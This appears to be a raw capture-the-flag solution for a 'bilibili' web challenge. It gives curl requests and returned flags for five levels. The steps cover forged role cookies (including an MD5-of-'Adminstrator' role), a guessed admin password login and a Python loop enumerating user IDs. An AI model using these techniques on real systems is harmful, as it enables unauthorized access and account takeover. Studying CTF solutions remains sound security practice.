flag 1
curl 'http://45.113.201.36/api/admin' \
  -H 'Connection: keep-alive' \
  -H 'Accept: */*' \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36 bilibili Security Browser' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Referer: http://45.113.201.36/index.html' \
  -H 'Accept-Language: zh-CN,zh;q=0.9' \
  -H 'Cookie: role=ee11cbb19052e40b07aac0ca060c23ee; session=eyJ1aWQiOiIxMTAxODUyNzEifQ.X5PH5A.FTJcYtSFGd6QWb8OfDLHTIriYgw' \
  --compressed \
  --insecure
3bf3bbab-1469a998-2162a9fd-38b3f1f0

flag 2
curl 'http://45.113.201.36/api/ctf/2' \
  -H 'Connection: keep-alive' \
  -H 'Accept: */*' \
  -H 'User-Agent: bilibili Security Browser' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Referer: http://45.113.201.36/index.html' \
  -H 'Accept-Language: zh-CN,zh;q=0.9' \
  -H 'Cookie: role=ee11cbb19052e40b07aac0ca060c23ee; session=eyJ1aWQiOiIxMTAxODUyNzEifQ.X5PH5A.FTJcYtSFGd6QWb8OfDLHTIriYgw' \
  --compressed \
  --insecure
04c1d5f7-7c716385-f10bd333-42f1e2c6

flag 3
curl 'http://45.113.201.36/api/ctf/3' \
  -H 'Connection: keep-alive' \
  -H 'Accept: application/json, text/javascript, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36' \
  -H 'Content-Type: application/json' \
  -H 'Origin: http://45.113.201.36' \
  -H 'Referer: http://45.113.201.36/login.html' \
  -H 'Accept-Language: zh-CN,zh;q=0.9' \
  -H 'Cookie: role=ee11cbb19052e40b07aac0ca060c23ee; session=eyJ1aWQiOiIxMTAxODUyNzEifQ.X5PH5A.FTJcYtSFGd6QWb8OfDLHTIriYgw' \
  --data-binary '{"username":"admin","passwd":"bilibili"}' \
  --compressed \
  --insecure
  
{"code":200,"data":"3057a8ce-a7e8e304-1328a920-7c2adb60","msg":""}

flag 4
curl "http://45.113.201.36/api/ctf/4" ^
  -H "Connection: keep-alive" ^
  -H "Accept: */*" ^
  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36" ^
  -H "X-Requested-With: XMLHttpRequest" ^
  -H "Referer: http://45.113.201.36/superadmin.html" ^
  -H "Accept-Language: zh-CN,zh;q=0.9" ^
  -H "Cookie: role=<md5 of Adminstrator>; session=eyJ1aWQiOiIxMTAxODUyNzEifQ.X5PH5A.FTJcYtSFGd6QWb8OfDLHTIriYgw" ^
  --compressed ^
  --insecure
{"code":200,"data":"dd9dfe46-1d232498-59363560-d635e4fb","msg":""}

flag 5
import os,json
for uid in range(100336889,100336889+100):
    uid1 = str(uid)
    response = os.popen("curl 'http://45.113.201.36/api/ctf/5?uid="+uid1+"' \
  -H 'Connection: keep-alive' \
  -H 'Accept: */*' \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Referer: http://45.113.201.36/user.html' \
  -H 'Accept-Language: zh-CN,zh;q=0.9' \
  -H 'Cookie: role=ee11cbb19052e40b07aac0ca060c23ee; session=eyJ1aWQiOiIxMTAxODUyNzEifQ.X5PYTg.OvGEmqZuNTkWw2Qec0W2GzEXvGg' \
  --compressed \
  --insecure").read()
    
    if '200' in response:
        success_uid = uid
        success_response = response
        break


print("--------------------------------------------------------")
print("success_uid = "+str(success_uid))
print("success_response = "+success_response)
print("--------------------------------------------------------")
